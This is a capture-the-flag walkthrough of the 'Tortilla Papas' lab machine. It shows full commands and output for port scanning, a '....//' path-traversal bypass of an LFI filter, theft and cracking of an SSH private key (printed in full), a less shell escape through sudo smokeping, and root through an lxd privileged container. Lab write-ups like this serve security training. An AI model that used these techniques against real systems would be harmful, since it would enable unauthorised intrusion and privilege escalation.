TheHackersLabs - Tortilla Papas machine walkthrough (WP)
城南花已开 Lv5

Information gathering

Service discovery

sudo arp-scan -l
[sudo] password for ctf:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 (Unknown)
192.168.60.2 00:50:56:e3:f6:57 (Unknown)
192.168.60.139 08:00:27:02:50:f0 (Unknown)
192.168.60.254 00:50:56:fd:82:05 (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.964 seconds (130.35 hosts/sec). 4 responded
export ip=192.168.60.139
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
With RustScan, I scan ports so fast, even my firewall gets whiplash 💨

[~] The config file is expected to be at "/home/ctf/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.139:22
Open 192.168.60.139:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-05 14:13 CST
Initiating ARP Ping Scan at 14:13
Scanning 192.168.60.139 [1 port]
Completed ARP Ping Scan at 14:13, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:13
Completed Parallel DNS resolution of 1 host. at 14:13, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 14:13
Scanning 192.168.60.139 [2 ports]
Discovered open port 80/tcp on 192.168.60.139
Discovered open port 22/tcp on 192.168.60.139
Completed SYN Stealth Scan at 14:13, 0.03s elapsed (2 total ports)
Nmap scan report for 192.168.60.139
Host is up, received arp-response (0.00070s latency).
Scanned at 2025-01-05 14:13:07 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:02:50:F0 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

Port 80 serves a static page with nothing of interest; every link on it is an in-page anchor.

image

Directory brute-forcing turns up /smokeping; SmokePing is a network latency monitor.

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.139
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 317] [--> http://192.168.60.139/images/]
/css (Status: 301) [Size: 314] [--> http://192.168.60.139/css/]
/js (Status: 301) [Size: 313] [--> http://192.168.60.139/js/]
/javascript (Status: 301) [Size: 321] [--> http://192.168.60.139/javascript/]
/smokeping (Status: 301) [Size: 320] [--> http://192.168.60.139/smokeping/]
/server-status (Status: 403) [Size: 279]
Progress: 207643 / 207644 (100.00%)
===============================================================

Nothing exploitable here, and there is no public PoC for this SmokePing instance either.

LFI (local file inclusion)

After switching through several wordlists, agua.php turns up.

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/dutch/list_7.txt -x php,html,zip,txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.139
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/dutch/list_7.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/agua.php (Status: 200) [Size: 26594]
Progress: 31320 / 31325 (99.98%)
===============================================================
Finished
===============================================================

Opening it shows the same landing page as /.

Guess that it has an LFI vulnerability; reference: File Inclusion/Path traversal - HackTricks

Try fuzzing the parameter name and value with wfuzz.

The wordlist I used is linked below.

Auto_Wordlists/wordlists/file_inclusion_linux.txt at main · carlospolop/Auto_Wordlists

I kept only the /etc/passwd entries; the full list is huge and takes a long time to run.

The fuzzing identifies the parameter name `file` and shows that three hops are enough to reach `/` (deeper payloads also hit, because extra `../` above the root are simply ignored). Note that in the output only the `....//` variants hit: that is the classic bypass for a filter that strips `../` in a single, non-recursive pass, since removing `../` from `....//` leaves `../`.

❯ wfuzz -c -u "http://$ip/agua.php?FUZZ=FUZ2Z" -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -w LFI.txt --hc 404 --hw 1556
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://192.168.60.139/agua.php?FUZZ=FUZ2Z
Total requests: 584848

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000010602: 200 507 L 1588 W 27943 Ch "file - ....//....//....//etc/passwd"
000010596: 200 507 L 1588 W 27943 Ch "file - ....//....//....//....//....//....//....//....//....//etc/passwd"
000010587: 200 507 L 1588 W 27943 Ch "file - ....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd"
000010593: 200 507 L 1588 W 27943 Ch "file - ....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd"
000010590: 200 507 L 1588 W 27943 Ch "file - ....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd"
000010584: 200 507 L 1588 W 27943 Ch "file - ....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd"
000010599: 200 507 L 1588 W 27943 Ch "file - ....//....//....//....//....//....//etc/passwd"

Now there is something to work with.
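Why only the `....//` form gets through, as an added example that is not code from the original post nor from the target's agua.php: a Python model of a filter that deletes `../` in one non-recursive pass, the builder for the depth-n bypass payload seen in the wfuzz hits, and a hardened resolver that canonicalises first and then enforces the web-root prefix. The web root `/var/www/html` (three directories below `/`) and the filter itself are assumptions chosen to reproduce the observed behaviour.

```python
import posixpath
from typing import Optional

# Assumed web root, three directories below "/": this is why three hops are the
# minimum.  The real path on the target is not known from the walkthrough.
WEB_ROOT = "/var/www/html"


def naive_strip_traversal(path: str) -> str:
    """The weak filter: delete every '../' in a single, non-recursive pass.

    '....//' contains exactly one '../' (at offset 2); deleting it leaves
    '../', so the traversal survives the filter.  str.replace, like a single
    str_replace()/preg_replace() in PHP, does not re-scan its own output.
    """
    return path.replace("../", "")


def resolve_naively(user_path: str) -> str:
    """Path the vulnerable include would open after the weak filter.

    posixpath.normpath is used instead of os.path.realpath so the example
    needs no filesystem; leading '..' components above '/' are discarded,
    which is why every depth >= 3 lands on the same file.
    """
    cleaned = naive_strip_traversal(user_path)
    return posixpath.normpath(posixpath.join(WEB_ROOT, cleaned))


def traversal_payload(depth: int, target: str = "etc/passwd") -> str:
    """Build the bypass payload used in the wfuzz hits for a given depth."""
    return "....//" * depth + target


def resolve_safely(user_path: str) -> Optional[str]:
    """Hardened resolver: canonicalise first, then enforce the web-root prefix.

    Returns None when the canonical path would leave WEB_ROOT.  In real code
    use os.path.realpath() here so symlinks are resolved before the check;
    a '....//' payload then stays inside the root as a non-existent name.
    """
    candidate = posixpath.normpath(posixpath.join(WEB_ROOT, user_path))
    root_prefix = WEB_ROOT.rstrip("/") + "/"
    if candidate == WEB_ROOT or candidate.startswith(root_prefix):
        return candidate
    return None


if __name__ == "__main__":
    for depth in (2, 3, 9):
        p = traversal_payload(depth)
        print(f"{p!r:70} -> {resolve_naively(p)}")
    print(resolve_naively("../../../etc/passwd"))   # plain form is neutralised
    print(resolve_safely("../../../etc/passwd"))    # hardened resolver: None
```

Depth 2 resolves to `/var/etc/passwd` and depth 3 or more to `/etc/passwd`, matching the hits above; the plain `../` form is neutralised by the strip, and the hardened resolver rejects the escape outright.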

image

/etc/passwd shows two ordinary users, sincebolla and concebolla.

Enumerating files through the LFI

Continuing to enumerate, a private key turns up at /opt/id_rsa.

Try using this key to log in. Save only the PEM block (strip the HTML template around it) and chmod 600 the file, otherwise ssh refuses to use the key.

❯ curl http://192.168.60.139/agua.php\?file\=....//....//....//opt/id_rsa
<!DOCTYPE html>
<html>
<head>
<!-- basic -->
... (omitted) ...
-----BEGIN OPENSSH PRIVATE KEY-----
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
rbxo5ujDv50IlgWtMbqTzTrZMbw=
-----END OPENSSH PRIVATE KEY-----
❯ vim id_rsa
❯ ssh2john id_rsa >hash
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
honda1 (id_rsa)
1g 0:00:01:19 DONE (2025-01-05 15:49) 0.01252g/s 44.50p/s 44.50c/s 44.50C/s cougar..01234
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
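Before spending minutes in john it is worth knowing whether the key is passphrase-protected at all and how costly its KDF is. The following is an added example, not code from the original post: it pulls the PEM block out of an HTML-wrapped LFI response like the curl output above and parses the plaintext header of the `openssh-key-v1` format. The sample page and key are constructed inline around dummy key material; on the real key above the same header decodes to `aes256-ctr` / `bcrypt`, consistent with john reporting `Bcrypt/AES` and an iteration count of 16.

```python
import base64
import re
import struct
from typing import Optional

PEM_RE = re.compile(
    r"-----BEGIN OPENSSH PRIVATE KEY-----\s*(.*?)\s*-----END OPENSSH PRIVATE KEY-----",
    re.S,
)
MAGIC = b"openssh-key-v1\x00"   # fixed prefix of the openssh-key-v1 format


def _wrap_pem(b64: str) -> str:
    lines = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return ("-----BEGIN OPENSSH PRIVATE KEY-----\n" + lines
            + "\n-----END OPENSSH PRIVATE KEY-----\n")


def extract_openssh_key(body: str) -> Optional[str]:
    """Pull the key out of an LFI response that wraps the file in the site's
    HTML template.  Returns clean PEM text ready to be written with mode 0600,
    or None if no key is present in the body."""
    m = PEM_RE.search(body)
    if not m:
        return None
    return _wrap_pem(re.sub(r"\s+", "", m.group(1)))


def _read_string(buf: bytes, off: int):
    """SSH wire 'string': uint32 big-endian length followed by that many bytes."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n


def inspect_openssh_key(pem: str) -> dict:
    """Parse the plaintext header of an openssh-key-v1 blob.

    Layout (OpenSSH PROTOCOL.key): magic, string ciphername, string kdfname,
    string kdfoptions, uint32 nkeys, ...  For kdfname "bcrypt", kdfoptions is
    string salt || uint32 rounds.  None of this needs the passphrase, so you
    learn whether a crack is needed, and how expensive each guess is, before
    starting john or hashcat.
    """
    m = PEM_RE.search(pem)
    if not m:
        raise ValueError("not an OpenSSH private key")
    blob = base64.b64decode(re.sub(r"\s+", "", m.group(1)))
    if not blob.startswith(MAGIC):
        raise ValueError("bad magic: not openssh-key-v1")
    off = len(MAGIC)
    cipher, off = _read_string(blob, off)
    kdf, off = _read_string(blob, off)
    kdfopts, off = _read_string(blob, off)
    (nkeys,) = struct.unpack(">I", blob[off:off + 4])
    info = {
        "cipher": cipher.decode(),
        "kdf": kdf.decode(),
        "encrypted": cipher != b"none",
        "nkeys": nkeys,
        "rounds": None,
        "salt_len": 0,
    }
    if kdf == b"bcrypt":
        salt, o = _read_string(kdfopts, 0)
        (info["rounds"],) = struct.unpack(">I", kdfopts[o:o + 4])
        info["salt_len"] = len(salt)
    return info


def build_sample_key(cipher: bytes, kdf: bytes, rounds: int) -> str:
    """Constructed test key: a valid openssh-key-v1 header around dummy key
    material.  This is NOT the key recovered from the target."""
    def s(b: bytes) -> bytes:
        return struct.pack(">I", len(b)) + b
    kdfopts = b"" if kdf == b"none" else s(b"\x00" * 16) + struct.pack(">I", rounds)
    blob = (MAGIC + s(cipher) + s(kdf) + s(kdfopts) + struct.pack(">I", 1)
            + s(b"\x00" * 32)     # stand-in public key blob
            + s(b"\x00" * 64))    # stand-in private section
    return _wrap_pem(base64.b64encode(blob).decode())


# Constructed stand-in for the LFI response: site template around the key.
SAMPLE_PAGE = ("<!DOCTYPE html>\n<html>\n<head>\n<!-- basic -->\n</head>\n<body>\n"
               + build_sample_key(b"aes256-ctr", b"bcrypt", 16)
               + "</body>\n</html>\n")


if __name__ == "__main__":
    key = extract_openssh_key(SAMPLE_PAGE)
    print(inspect_openssh_key(key))
```

ssh2john performs the same parse internally; doing it up front tells you whether a wordlist attack is even required (`cipher == none` means the key works as-is) and, for bcrypt, the `rounds` value that sets the per-guess cost you see in john's rate.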

User access

I've noticed that the private keys on this lab's machines are always passphrase-protected 🤣

❯ ssh sincebolla@192.168.60.139 -i id_rsa
Enter passphrase for key 'id_rsa':
Linux tortillapapas 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Apr 18 12:40:58 2024 from 192.168.0.104
sincebolla@tortillapapas:~$ ls
user.txt
sincebolla@tortillapapas:~$ cat user.txt
1cf125d2f4596108e4ef88c20ace1fc1
sincebolla@tortillapapas:~$ sudo -l
Matching Defaults entries for sincebolla on tortillapapas:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User sincebolla may run the following commands on tortillapapas:
(concebolla) NOPASSWD: /usr/sbin/smokeping

sudo privilege escalation

sudo -l shows we may run /usr/sbin/smokeping as concebolla without a password, so check its help text to see how it is used.

It can display its own manpage (--man), which goes through man and is paged with less; less allows shell escapes, so that is the way up.

sincebolla@tortillapapas:~$ sudo -u concebolla /usr/sbin/smokeping --help
Usage:
smokeping [ --email | --makepod | --version | --restart ]

Options:

--man[=x] Show the manpage for the program (or for probe x, if specified)

--help Help :-)

... (omitted) ...

--shared-secret=s File containing the shared secret for talking to the server.

--cache-dir=s Directory for temporary data storage when running in slave mode.

--pid-dir=s Directory for the PID file when running in slave mode.
(optional, defaults to --cache-dir)

So escape from less directly: run `sudo -u concebolla /usr/sbin/smokeping --man` and, at the less prompt, type `!/bin/bash`. The pager runs with concebolla's uid, so the spawned shell does too. (This only works because the pager is started without LESSSECURE=1, which would disable the `!` command.)

image

Root privilege escalation

concebolla@tortillapapas:/home/sincebolla$ id
uid=1000(concebolla) gid=1000(concebolla) grupos=1000(concebolla),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev),1002(lxd)

id also shows that this user is in the lxd group.

Membership in lxd is enough for root: import an image served from the attacker box, create a container with security.privileged=true, mount the host's / at /mnt/root inside it, and root in the container can read and write the whole host filesystem. For the full procedure see [[Vulnhub] Prime (2021) 2 machine walkthrough (WP) | Pepster's Blog](https://pepster.me/2024/12/11/VulnHub-Prime (2021) 2靶机详解WP/).

concebolla@tortillapapas:/tmp$ wget 192.168.60.100/lxd.tar.xz
--2025-01-05 09:21:27-- http://192.168.60.100/lxd.tar.xz
Conectando con 192.168.60.100:80... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 896 [application/octet-stream]
Grabando a: «lxd.tar.xz»

lxd.tar.xz 100%[=======================================================================>] 896 --.-KB/s en 0s

2025-01-05 09:21:27 (114 MB/s) - «lxd.tar.xz» guardado [896/896]

concebolla@tortillapapas:/tmp$ wget 192.168.60.100/rootfs.squashfs
--2025-01-05 09:21:39-- http://192.168.60.100/rootfs.squashfs
Conectando con 192.168.60.100:80... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 3092480 (2.9M) [application/octet-stream]
Grabando a: «rootfs.squashfs»

rootfs.squashfs 100%[=======================================================================>] 2.95M --.-KB/s en 0.1s

2025-01-05 09:21:40 (26.4 MB/s) - «rootfs.squashfs» guardado [3092480/3092480]

concebolla@tortillapapas:/tmp$ lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
Image imported with fingerprint: 8300692522052a791a2509d9b6e81f74937de1bd3eb3289e747f3fbbc954aeaa
concebolla@tortillapapas:/tmp$ lxc init alpine privesc -c security.privileged=true
Creating privesc
concebolla@tortillapapas:/tmp$ lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
Device host-root added to privesc
Device host-root added to privesc
bash: Device: orden no encontrada
concebolla@tortillapapas:/tmp$ lxc start privesc
concebolla@tortillapapas:/tmp$ lxc exec privesc /bin/sh
~ # id
uid=0(root) gid=0(root)
~ # cat /mnt/root/root/root.txt
9df6598994dbd7a4f843b6f326f81f18

OK, that's it 🥳
